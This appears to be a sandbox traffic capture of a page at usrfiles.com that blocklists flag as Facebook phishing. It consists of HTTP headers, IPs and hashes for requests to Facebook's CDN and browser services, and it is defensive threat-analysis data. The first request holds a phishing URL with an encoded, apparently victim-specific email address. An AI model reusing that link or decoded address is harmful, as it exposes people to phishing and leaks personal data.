GET /html/d717b5_84399193f1fde90a24ff165dbe8c6c9d.html?147615U295d2luZ3M5OUBpY2xvdWQuY29thttps= HTTP/1.1 Host: www.usrfiles.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1	34.102.176.152 HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: openresty/1.21.4.1 Content-Length: 83356 Accept-Ranges: bytes Access-Control-Allow-Origin: * Timing-Allow-Origin: * X-Seen-By: gcp.us-central-1.media-router-77bc6f7769-d4jl6 Via: 1.1 google Date: Wed, 22 Mar 2023 03:02:57 GMT Expires: Wed, 22 Mar 2023 04:02:57 GMT Cache-Control: public, max-age=15552000, immutable Age: 1794 Last-Modified: Mon, 13 Mar 2023 21:25:16 GMT ETag: "84399193f1fde90a24ff165dbe8c6c9d" --- Additional Info --- Magic: HTML document, ASCII text, with very long lines (64621) Size: 83356 Md5: 84399193f1fde90a24ff165dbe8c6c9d Sha1: 6e7789c33d8a51910cf2f2f094689f232c679c46 Sha256: 98d611f0014b928623b6e8f374e06c9551742fe97f6a4026420d80db39ea7341 Blocklists: - openphish: Facebook, Inc. - fortinet: Phishing
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "1DC32C78E4E850303813338FD4E9616A41C8C05D1063748A1E76A92C397A5E8F" Last-Modified: Mon, 20 Mar 2023 02:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=8282 Expires: Wed, 22 Mar 2023 05:50:53 GMT Date: Wed, 22 Mar 2023 03:32:51 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: ec332b81a27117ce9c16b67a5a8e4fac Sha1: b6d2afa2c859d000ad830d3d8d73f57bac6ffce2 Sha256: 1dc32c78e4e850303813338fd4e9616a41c8c05d1063748a1e76a92c397a5e8f
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "08378FE6A897AB5A9C8D3BC2748C9670659D0D0D164317FDFAC88D23FEE78FA0" Last-Modified: Sun, 19 Mar 2023 17:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=10742 Expires: Wed, 22 Mar 2023 06:31:53 GMT Date: Wed, 22 Mar 2023 03:32:51 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 28774b36cf8bb6b054329393a33f6239 Sha1: 728313ddff6d5ceb6db3eb8445f039779616a140 Sha256: 08378fe6a897ab5a9c8d3bc2748c9670659d0d0d164317fdfac88d23fee78fa0
GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	35.241.9.150 HTTP/2 200 OK content-type: application/json access-control-allow-origin: * access-control-expose-headers: Content-Type, Retry-After, Content-Length, Backoff, Alert content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; strict-transport-security: max-age=31536000 x-content-type-options: nosniff content-length: 939 via: 1.1 google date: Wed, 22 Mar 2023 03:15:00 GMT age: 1071 cache-control: max-age=3600,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JSON data\012- , ASCII text, with very long lines (939), with no line terminators Size: 939 Md5: bc86ef2a0cee04915bc360f5821adc8f Sha1: 3658f9028cce204d38f7f48fcfaa2a8e4f54383a Sha256: aeecd718d03811322457de4f20828bdba86b277e7e0e328cae9c0a8075638454
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "905537EF3E3A4A9030391B44BD6AC6BB5D7C9EC752B1821D683DFBF483096163" Last-Modified: Sun, 19 Mar 2023 17:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=14686 Expires: Wed, 22 Mar 2023 07:37:37 GMT Date: Wed, 22 Mar 2023 03:32:51 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 4e6141892ec4705c6a0134f3157b969d Sha1: 4169fdea42b0fa9cb565e14b8e8fdb293575c78e Sha256: 905537ef3e3a4a9030391b44bd6ac6bb5d7c9ec752b1821d683dfbf483096163
GET /chains/remote-settings.content-signature.mozilla.org-2023-04-30-16-53-14.chain HTTP/1.1 Host: content-signature-2.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	34.160.144.191 HTTP/2 200 OK content-type: binary/octet-stream x-amz-id-2: Q10sANKLj4s6v0TvsrT8DxN1nbxhFXni4/lkJHtDFoUNY+MUVmxN6xhAJt72B7/abm+okB/eipQ= x-amz-request-id: XPFKNHTT6S8TXWAN x-amz-server-side-encryption: AES256 content-disposition: attachment accept-ranges: bytes server: AmazonS3 content-length: 5348 via: 1.1 google date: Wed, 22 Mar 2023 02:59:22 GMT age: 2009 last-modified: Sat, 11 Mar 2023 16:53:15 GMT etag: "e7bace7c1e04d44012e37ddffe36e5d5" cache-control: public,max-age=3600 alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: PEM certificate\012- , ASCII text Size: 5348 Md5: e7bace7c1e04d44012e37ddffe36e5d5 Sha1: 3ac8d7c0a9d3e3f0b28b2530c7b8d8407b4042c2 Sha256: 6b4f80f2e95b26f6122ea8dcd0ef8d762299be822c69e839fc37581ca2bcb5f2
GET /v1/tiles HTTP/1.1 Host: contile.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.117.237.239 HTTP/2 200 OK content-type: application/json server: nginx date: Wed, 22 Mar 2023 03:32:51 GMT content-length: 12 access-control-allow-credentials: true vary: Origin, Access-Control-Request-Method, Access-Control-Request-Headers access-control-expose-headers: content-type strict-transport-security: max-age=31536000 via: 1.1 google alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JSON data\012- , ASCII text, with no line terminators Size: 12 Md5: 23e88fb7b99543fb33315b29b1fad9d6 Sha1: a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	192.229.221.95 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2560 Cache-Control: max-age=121263 Date: Wed, 22 Mar 2023 03:32:51 GMT Etag: "6419a392-1d7" Expires: Thu, 23 Mar 2023 13:13:54 GMT Last-Modified: Tue, 21 Mar 2023 12:31:14 GMT Server: ECAcc (ska/F776) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: e2ba316dbf0d1c231f12512204d0e832 Sha1: 16271f049892b4d07ab70043935b1873a2e423f9 Sha256: 99a5a7e359df4cc82ef7a931bc93c0252f28c938155c1a6bd886550a0709cb11
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	192.229.221.95 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2377 Cache-Control: max-age=121080 Date: Wed, 22 Mar 2023 03:32:51 GMT Etag: "6419a392-1d7" Expires: Thu, 23 Mar 2023 13:10:51 GMT Last-Modified: Tue, 21 Mar 2023 12:31:14 GMT Server: ECAcc (ska/F6AF) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: e2ba316dbf0d1c231f12512204d0e832 Sha1: 16271f049892b4d07ab70043935b1873a2e423f9 Sha256: 99a5a7e359df4cc82ef7a931bc93c0252f28c938155c1a6bd886550a0709cb11
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	192.229.221.95 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2377 Cache-Control: max-age=121080 Date: Wed, 22 Mar 2023 03:32:51 GMT Etag: "6419a392-1d7" Expires: Thu, 23 Mar 2023 13:10:51 GMT Last-Modified: Tue, 21 Mar 2023 12:31:14 GMT Server: ECAcc (ska/F6D2) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: e2ba316dbf0d1c231f12512204d0e832 Sha1: 16271f049892b4d07ab70043935b1873a2e423f9 Sha256: 99a5a7e359df4cc82ef7a931bc93c0252f28c938155c1a6bd886550a0709cb11
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	192.229.221.95 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2377 Cache-Control: max-age=121080 Date: Wed, 22 Mar 2023 03:32:51 GMT Etag: "6419a392-1d7" Expires: Thu, 23 Mar 2023 13:10:51 GMT Last-Modified: Tue, 21 Mar 2023 12:31:14 GMT Server: ECAcc (ska/F6AF) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: e2ba316dbf0d1c231f12512204d0e832 Sha1: 16271f049892b4d07ab70043935b1873a2e423f9 Sha256: 99a5a7e359df4cc82ef7a931bc93c0252f28c938155c1a6bd886550a0709cb11
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	192.229.221.95 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2560 Cache-Control: max-age=121263 Date: Wed, 22 Mar 2023 03:32:51 GMT Etag: "6419a392-1d7" Expires: Thu, 23 Mar 2023 13:13:54 GMT Last-Modified: Tue, 21 Mar 2023 12:31:14 GMT Server: ECAcc (ska/F776) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: e2ba316dbf0d1c231f12512204d0e832 Sha1: 16271f049892b4d07ab70043935b1873a2e423f9 Sha256: 99a5a7e359df4cc82ef7a931bc93c0252f28c938155c1a6bd886550a0709cb11
GET /rsrc.php/v3/yU/r/ZFA2ZKi8_ij.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	157.240.205.11 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: 15JBb37LMIh48yJqRtiu4b5rJfkmGeXL7bd9BC6W6kEpuMNW230eSEgT69ZNR0DMXM+Qn3HkfJhLJjpdAd8fSw== content-length: 0 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3/yF/r/sAcaU2FJdDD.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site TE: trailers	157.240.205.11 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: vZw7JiyIM2TjWI0iaNFdHGlXk+uA4qOYZQEtxg1jlLub2Ld5+3K09roCwL+2B8m+WtG5vopGQajDGBsUbdSCsg== content-length: 0 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3i0VU4/yb/l/es_LA/29KpN-SSjEW.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	157.240.205.11 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: 803SrY03/88ViuZYJQ+4/wl3Za0XBhuJ/XEEP9U5K4BX0unlvs4sfOYvzW2ufB2D2gw/hNklbOZtWpMv1yaz5Q== content-length: 0 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3/yp/l/0,cross/SieMvexb4RV.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	157.240.205.11 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: MgKt8+bJgagmduuxBxYgcYA/habFttf1oSyysecrzd2YlaCBGlqrSrVBITKjWaPn940VdvMF9Tyo8N+7SITkXQ== content-length: 0 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3/y1/l/0,cross/v-qA4RoF1Br.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	157.240.205.11 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: IkbfYEsCWOJ2te5SgFmKbTgp0SmyGiCZbOthxqM12cX4vQGUYyq30fRqXauHzoxQn2j5dFSSnqD+lMUAdEaHcA== content-length: 0 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	192.229.221.95 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2378 Cache-Control: max-age=121080 Date: Wed, 22 Mar 2023 03:32:52 GMT Etag: "6419a392-1d7" Expires: Thu, 23 Mar 2023 13:10:52 GMT Last-Modified: Tue, 21 Mar 2023 12:31:14 GMT Server: ECAcc (ska/F775) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: e2ba316dbf0d1c231f12512204d0e832 Sha1: 16271f049892b4d07ab70043935b1873a2e423f9 Sha256: 99a5a7e359df4cc82ef7a931bc93c0252f28c938155c1a6bd886550a0709cb11
GET /rsrc.php/v3ivXO4/yZ/l/es_LA/wgQtNFI9dU-.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	157.240.205.11 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: x4FASVN5RpbtjJECcXH8/COPcrujp+5C5l4AIsYNQErQrOgIc/iUnKWTTWY0xrohiGcbCjs0fPfid9UvRsSkYg== content-length: 0 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	35.241.9.150 HTTP/2 200 OK content-type: application/json access-control-allow-origin: * access-control-expose-headers: ETag, Last-Modified, Retry-After, Content-Length, Alert, Cache-Control, Expires, Content-Type, Backoff, Pragma content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; strict-transport-security: max-age=31536000 x-content-type-options: nosniff content-length: 329 via: 1.1 google date: Wed, 22 Mar 2023 03:14:33 GMT age: 1099 last-modified: Fri, 25 Mar 2022 17:45:46 GMT etag: "1648230346554" cache-control: max-age=3600,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JSON data\012- , ASCII text, with very long lines (329), with no line terminators Size: 329 Md5: 0333b0655111aa68de771adfcc4db243 Sha1: 63f295a144ac87a7c8e23417626724eeca68a7eb Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /rsrc.php/v3/y2/l/0,cross/xJKJrMq7d3M.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site TE: trailers	157.240.205.11 HTTP/2 200 OK content-type: text/css; charset=utf-8 vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Thu, 21 Mar 2024 03:32:52 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: JbSfI8YbGYe1S8cBOp7K+A== x-fb-debug: y5AcQXj11J3NJJX91LEEXaoX05WAOli5ncvN/P4sdoCmVj0Rh1iIAkewgfvxsSESfNfv4dZBFoZMKdmtnmt+MA== content-length: 3289 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (7535) Size: 3289 Md5: 25b49f23c61b1987b54bc7013a9ecaf8 Sha1: b76ffa665051c25dbae0d4ad186b6573e6592064 Sha256: e464203e8e625ad77c7dc5bd298fddb1b7364629eeb0a24310efa4944285c4bf
